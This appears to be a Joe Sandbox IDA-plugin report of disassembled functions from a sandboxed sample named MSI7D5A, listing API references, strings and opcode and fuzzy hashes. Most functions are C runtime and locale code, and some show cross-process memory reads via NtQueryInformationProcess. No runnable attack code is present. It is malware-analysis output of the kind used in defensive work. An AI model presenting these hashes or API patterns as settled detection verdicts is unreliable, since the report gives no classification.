                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3
                                                      • String ID: %H : %M$%H : %M : %S$%I : %M : %S %p$%b %d %H : %M : %S %Y$%d / %m / %y$%m / %d / %y$:AM:am:PM:pm
                                                      • API String ID: 1383202999-2891247106
                                                      • Opcode ID: 7ef603c18d10a93386540d0c7fe487f29bcc61dfbc771b904fd3a501327ca771
                                                      • Instruction ID: 1bd60a15ad83453099591563ea8fd535ae0fdd39906842d10c08dc58bb3eb3e1
                                                      • Opcode Fuzzy Hash: 7ef603c18d10a93386540d0c7fe487f29bcc61dfbc771b904fd3a501327ca771
                                                      • Instruction Fuzzy Hash: 78B1917250020AAFCF19EFA8C955DFE7BB9FB08361F144519FE02A725AD631CA14DB60
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • __EH_prolog3_GS.LIBCMT ref: 00A5855C
                                                      • _Maklocstr.LIBCPMT ref: 00A585C5
                                                      • _Maklocstr.LIBCPMT ref: 00A585D7
                                                      • _Maklocchr.LIBCPMT ref: 00A585EF
                                                      • _Maklocchr.LIBCPMT ref: 00A585FF
                                                      • _Getvals.LIBCPMT ref: 00A58621
                                                        • Part of subcall function 00A51CD4: _Maklocchr.LIBCPMT ref: 00A51D03
                                                        • Part of subcall function 00A51CD4: _Maklocchr.LIBCPMT ref: 00A51D19
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: Maklocchr$Maklocstr$GetvalsH_prolog3_
                                                      • String ID: false$true
                                                      • API String ID: 3549167292-2658103896
                                                      • Opcode ID: 8ed325e2737b3d2e4b62dfc3ba0c33f5c933f7404321b024c2f7feae39a64fce
                                                      • Instruction ID: b4eeca0e3ac6dfa310e76c9b68a18ff837399090efdda31d34aab25a39ae4fc8
                                                      • Opcode Fuzzy Hash: 8ed325e2737b3d2e4b62dfc3ba0c33f5c933f7404321b024c2f7feae39a64fce
                                                      • Instruction Fuzzy Hash: 3F2183B1D00304ABDF15EFB4D986AEE7BB8BF04711F008156BD09AF142DA708944CBA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • std::locale::_Init.LIBCPMT ref: 00A49763
                                                        • Part of subcall function 00A50C94: __EH_prolog3.LIBCMT ref: 00A50C9B
                                                        • Part of subcall function 00A50C94: std::_Lockit::_Lockit.LIBCPMT ref: 00A50CA6
                                                        • Part of subcall function 00A50C94: std::locale::_Setgloballocale.LIBCPMT ref: 00A50CC1
                                                        • Part of subcall function 00A50C94: std::_Lockit::~_Lockit.LIBCPMT ref: 00A50D17
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00A4978A
                                                      • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00A497F0
                                                      • std::locale::_Locimp::_Makeloc.LIBCPMT ref: 00A4984A
                                                        • Part of subcall function 00A4F57A: __EH_prolog3.LIBCMT ref: 00A4F581
                                                        • Part of subcall function 00A4F57A: std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00A4F5C8
                                                        • Part of subcall function 00A4F57A: std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00A4F620
                                                        • Part of subcall function 00A4F57A: std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00A4F654
                                                        • Part of subcall function 00A4F57A: std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00A4F6A8
                                                      • LocalFree.KERNEL32(00000000,00000000,?,00A954B1,00000000), ref: 00A499BF
                                                      • __cftoe.LIBCMT ref: 00A49B0B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: std::locale::_$Locimp::_$AddfacLocimp_std::_$Lockit$H_prolog3Lockit::_$FreeInitLocalLocinfo::_Locinfo_ctorLockit::~_MakelocSetgloballocale__cftoe
                                                      • String ID: bad locale name
                                                      • API String ID: 3103716676-1405518554
                                                      • Opcode ID: 898dc86bc5bb63b494b522555e602258547314d944bd37e8a7328e116b54a81a
                                                      • Instruction ID: e75233751ae41fe6ff7ff1ddc10b65858ddc3f712ba81e94cf1874e18f50106b
                                                      • Opcode Fuzzy Hash: 898dc86bc5bb63b494b522555e602258547314d944bd37e8a7328e116b54a81a
                                                      • Instruction Fuzzy Hash: 1BF19D75E01248DFDF10CFA8C985BAFBBB5EF49304F244169E805AB381E7359A15CBA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                        • Part of subcall function 00A436D0: GetSystemDirectoryW.KERNEL32(?,00000105), ref: 00A43735
                                                        • Part of subcall function 00A436D0: _wcschr.LIBVCRUNTIME ref: 00A437C6
                                                      • GetProcAddress.KERNEL32(?,NtQueryInformationProcess), ref: 00A43CA8
                                                      • ReadProcessMemory.KERNEL32(?,?,?,000001D8,00000000,00000000,00000018,00000000), ref: 00A43D01
                                                      • ReadProcessMemory.KERNEL32(?,?,?,00000048,00000000,?,000001D8,00000000,00000000,00000018,00000000), ref: 00A43D7A
                                                      • ReadProcessMemory.KERNEL32(?,?,00000000,?,00000000,?,?,?,00000000,?,?,?,00000048,00000000,?,000001D8), ref: 00A43EB1
                                                      • GetLastError.KERNEL32 ref: 00A43F34
                                                      • FreeLibrary.KERNEL32(?), ref: 00A43F7B
                                                      Strings
                                                      • NtQueryInformationProcess, xrefs: 00A43CA2
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: MemoryProcessRead$AddressDirectoryErrorFreeLastLibraryProcSystem_wcschr
                                                      • String ID: NtQueryInformationProcess
                                                      • API String ID: 566592816-2781105232
                                                      • Opcode ID: e82bd46f2c774edb054da0525e9d7e33891937fc732d29fd2cd2cf39b6270f95
                                                      • Instruction ID: 1f8ecf38dda7db975d9e222112c76cee05a1f0279216a2eccebc313fad0d189b
                                                      • Opcode Fuzzy Hash: e82bd46f2c774edb054da0525e9d7e33891937fc732d29fd2cd2cf39b6270f95
                                                      • Instruction Fuzzy Hash: 05A16871D05649DEEF20CF64CC49BAEBBF0EF48304F204599D449A7290E7B5AA88CF91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • LocalAlloc.KERNEL32(00000040,40000022,838A949E,?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00A44154
                                                      • LocalAlloc.KERNEL32(00000040,3FFFFFFF,838A949E,?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00A44177
                                                      • LocalFree.KERNEL32(?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00A44217
                                                      • OpenProcess.KERNEL32(00000400,00000000,?,838A949E,?,?,?), ref: 00A442D2
                                                      • OpenProcess.KERNEL32(00000400,00000000,?,?,838A949E,?,?,?), ref: 00A442F3
                                                      • GetProcessTimes.KERNEL32(00000000,?,00000000,00000000,00000000,?,838A949E,?,?,?), ref: 00A44326
                                                      • GetProcessTimes.KERNEL32(00000000,?,00000000,00000000,00000000,?,838A949E,?,?,?), ref: 00A44337
                                                      • CloseHandle.KERNEL32(00000000,?,838A949E,?,?,?), ref: 00A44355
                                                      • CloseHandle.KERNEL32(00000000,?,838A949E,?,?,?), ref: 00A44371
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: Process$Local$AllocCloseHandleOpenTimes$Free
                                                      • String ID:
                                                      • API String ID: 1424318461-0
                                                      • Opcode ID: 3a624d123054dfdd946efae65f5941c3785dd4a556e861364c8d6a7491fc75e8
                                                      • Instruction ID: c66e10c27d2bada93e4eb8a6badbdf702048fe89b8cf502733c35adfa051f732
                                                      • Opcode Fuzzy Hash: 3a624d123054dfdd946efae65f5941c3785dd4a556e861364c8d6a7491fc75e8
                                                      • Instruction Fuzzy Hash: 52818D75E002059FDB14CFA8D985BAEBBB5FB8C710F244229E925E73D0D771A9418BA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • GetCPInfo.KERNEL32(?,?,?,?,?), ref: 00A626F8
                                                      • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00A62786
                                                      • __alloca_probe_16.LIBCMT ref: 00A627B0
                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00A627F8
                                                      • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00A62812
                                                      • __alloca_probe_16.LIBCMT ref: 00A62838
                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00A62875
                                                      • CompareStringEx.KERNEL32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 00A62892
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: ByteCharMultiWide$__alloca_probe_16$CompareInfoString
                                                      • String ID:
                                                      • API String ID: 3603178046-0
                                                      • Opcode ID: 28a765bef843c5f6c0b4f2f50003e134a6e7b86ac702d393b737ad4c75041299
                                                      • Instruction ID: 3ab0f8c9bdbb58aae10d2102bc7121413e71d24023edc64e7357702b1d6c88bd
                                                      • Opcode Fuzzy Hash: 28a765bef843c5f6c0b4f2f50003e134a6e7b86ac702d393b737ad4c75041299
                                                      • Instruction Fuzzy Hash: 2071C376900A0AAFDF218FA4CD85FEE7BB6EF45350F284119F904A7291DB31C901CB60
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 00A621A3
                                                      • __alloca_probe_16.LIBCMT ref: 00A621CF
                                                      • MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 00A6220E
                                                      • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00A6222B
                                                      • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00A6226A
                                                      • __alloca_probe_16.LIBCMT ref: 00A62287
                                                      • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00A622C9
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00A622EC
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: ByteCharMultiStringWide$__alloca_probe_16
                                                      • String ID:
                                                      • API String ID: 2040435927-0
                                                      • Opcode ID: 0faeee61409eb7b03454628d19f56b43154ba2e8a4c7cd474573bebff2de9a45
                                                      • Instruction ID: 56fd623a18a4d50770e0e59036aa6790e8ba6afdd61c2f938266959ba11249a0
                                                      • Opcode Fuzzy Hash: 0faeee61409eb7b03454628d19f56b43154ba2e8a4c7cd474573bebff2de9a45
                                                      • Instruction Fuzzy Hash: DF51AF7290060AAFEF208FA4CC45FEF7BB9EF45B80F214528FA15AA150D734CD119B60
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00A48657
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00A48679
                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00A486A1
                                                      • LocalAlloc.KERNEL32(00000040,00000044,00000000,838A949E,?,00000000), ref: 00A486F9
                                                      • __Getctype.LIBCPMT ref: 00A4877B
                                                      • std::_Facet_Register.LIBCPMT ref: 00A487E4
                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00A4880E
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$AllocFacet_GetctypeLocalRegister
                                                      • String ID:
                                                      • API String ID: 2372200979-0
                                                      • Opcode ID: 80ae0014b370525a4bf41d6490b4b69e9a6fe80a2ac8c95ebc3501a16a11669b
                                                      • Instruction ID: 1af272fc29cb176bc5e9ac86c578c740c4768e035a12d4284871912c15834668
                                                      • Opcode Fuzzy Hash: 80ae0014b370525a4bf41d6490b4b69e9a6fe80a2ac8c95ebc3501a16a11669b
                                                      • Instruction Fuzzy Hash: 2D61E075D00644CFCB11CFA8D940BAEBBF0FF54314F248259E845AB392EB34AA85CB91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00A492A0
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00A492C2
                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00A492EA
                                                      • LocalAlloc.KERNEL32(00000040,00000018,00000000,838A949E,?,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 00A49342
                                                      • __Getctype.LIBCPMT ref: 00A493BD
                                                      • std::_Facet_Register.LIBCPMT ref: 00A493F8
                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00A49422
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$AllocFacet_GetctypeLocalRegister
                                                      • String ID:
                                                      • API String ID: 2372200979-0
                                                      • Opcode ID: eba4fc671ee5a676947463bca4370ec81e1d740787a065c14ced6e9552b4b6e8
                                                      • Instruction ID: 9fc4638d657384176b745d05a74b9937056e28756a8967a5a67f2805695555d2
                                                      • Opcode Fuzzy Hash: eba4fc671ee5a676947463bca4370ec81e1d740787a065c14ced6e9552b4b6e8
                                                      • Instruction Fuzzy Hash: F951CA74A04209DFCB21CFA8C945BAFBBF4FB55710F20819DE845AB391DB70AA45CB90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • _ValidateLocalCookies.LIBCMT ref: 00A63F57
                                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 00A63F5F
                                                      • _ValidateLocalCookies.LIBCMT ref: 00A63FE8
                                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 00A64013
                                                      • _ValidateLocalCookies.LIBCMT ref: 00A64068
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                      • String ID: csm
                                                      • API String ID: 1170836740-1018135373
                                                      • Opcode ID: 3477420dfcfac9ce742629981e710844eb2fd5b301031fd536855b952c43d5fc
                                                      • Instruction ID: 582fd1872131841f3226f034633695e821fe4cb5f547aa7f971a44404e75312f
                                                      • Opcode Fuzzy Hash: 3477420dfcfac9ce742629981e710844eb2fd5b301031fd536855b952c43d5fc
                                                      • Instruction Fuzzy Hash: 1941A235E00219ABCF10DF68C885A9EBBB5FF44324F148459ED159B392D775EE06CB90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • FreeLibrary.KERNEL32(00000000,?,00A77408,00A73841,0000000C,?,00000000,00000000,?,00A77632,00000021,FlsSetValue,00A8BD58,00A8BD60,?), ref: 00A773BC
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: FreeLibrary
                                                      • String ID: api-ms-$ext-ms-
                                                      • API String ID: 3664257935-537541572
                                                      • Opcode ID: b605bc7a164d1353fff8e729a994b87b545a7f516dccc8f856e1f3a5695c7ede
                                                      • Instruction ID: c1b5bfe6911f314128e71be5826492584eecd3d20eac8e518f2f991bf64abf7a
                                                      • Opcode Fuzzy Hash: b605bc7a164d1353fff8e729a994b87b545a7f516dccc8f856e1f3a5695c7ede
                                                      • Instruction Fuzzy Hash: 3121D536B09211EBD721DBA49C45E6E37689B81760F258610FD19AB291D730ED01D7A0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00A4B531
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00A4B54F
                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00A4B577
                                                      • LocalAlloc.KERNEL32(00000040,0000000C,00000000,838A949E,?,00000000,00000000), ref: 00A4B5CF
                                                      • std::_Facet_Register.LIBCPMT ref: 00A4B6B7
                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00A4B6E1
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$AllocFacet_LocalRegister
                                                      • String ID:
                                                      • API String ID: 3931714976-0
                                                      • Opcode ID: 93106f4b29b588db08a564a14b0d53d61db58d0ea9ad95020cc6e81d11f95caf
                                                      • Instruction ID: e6c4c09422c6297739e803847f5534e0169a44f2db1d71118c9c5322ba9a4a92
                                                      • Opcode Fuzzy Hash: 93106f4b29b588db08a564a14b0d53d61db58d0ea9ad95020cc6e81d11f95caf
                                                      • Instruction Fuzzy Hash: 8751C175900248DFDB11CFA8C980BAEFBB4FF50314F25415AE816AB391DBB5DA05CB91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00A4B731
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00A4B74F
                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00A4B777
                                                      • LocalAlloc.KERNEL32(00000040,00000008,00000000,838A949E,?,00000000,00000000), ref: 00A4B7CF
                                                      • std::_Facet_Register.LIBCPMT ref: 00A4B863
                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00A4B88D
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$AllocFacet_LocalRegister
                                                      • String ID:
                                                      • API String ID: 3931714976-0
                                                      • Opcode ID: e342f4973f0675308eb552aadc1476167e57ad56830dd84aaea2e664adab9c10
                                                      • Instruction ID: cc27f074d583cc6d86720fbd562bfe6fe6c209982eff51b5fbb69b4bf205f834
                                                      • Opcode Fuzzy Hash: e342f4973f0675308eb552aadc1476167e57ad56830dd84aaea2e664adab9c10
                                                      • Instruction Fuzzy Hash: D3519B75A05214DFCB11CFA8C980B9EBBB4FF94714F24815EE855AB282DB74EA05CB90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: __freea$__alloca_probe_16
                                                      • String ID: a/p$am/pm
                                                      • API String ID: 3509577899-3206640213
                                                      • Opcode ID: b246131b6aad5b32382614b46e1ab00b32891265ccfeff52ed79e4a861bd6fb4
                                                      • Instruction ID: 3caee4758fb37c16ad9a4283011d352b8ec059f62525de3a33657e1fd1b55bc2
                                                      • Opcode Fuzzy Hash: b246131b6aad5b32382614b46e1ab00b32891265ccfeff52ed79e4a861bd6fb4
                                                      • Instruction Fuzzy Hash: 22C1D975900606DBCB28CF68CD99EBAB7B0FF45700F28C049EA0DAB650D275AD41CFA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • GetLastError.KERNEL32(?,?,00A6596F,00A64900,00A6358F), ref: 00A65986
                                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00A65994
                                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00A659AD
                                                      • SetLastError.KERNEL32(00000000,00A6596F,00A64900,00A6358F), ref: 00A659FF
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: ErrorLastValue___vcrt_
                                                      • String ID:
                                                      • API String ID: 3852720340-0
                                                      • Opcode ID: 9c9119093a24ac1e20abd315f0fcba9d28bb80932eb39d9a62c03969a6a0968d
                                                      • Instruction ID: 41a8d8aa32f644fe69f05caf27fb675570ab98696fe768dde0a6caff2eff6534
                                                      • Opcode Fuzzy Hash: 9c9119093a24ac1e20abd315f0fcba9d28bb80932eb39d9a62c03969a6a0968d
                                                      • Instruction Fuzzy Hash: E9018437709F12EFE62567F66D86A6A2B74DB02779F20032AF514951F1EE114C129290
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • GetTempFileNameW.KERNEL32(?,URL,00000000,?,838A949E,?,00000004), ref: 00A43294
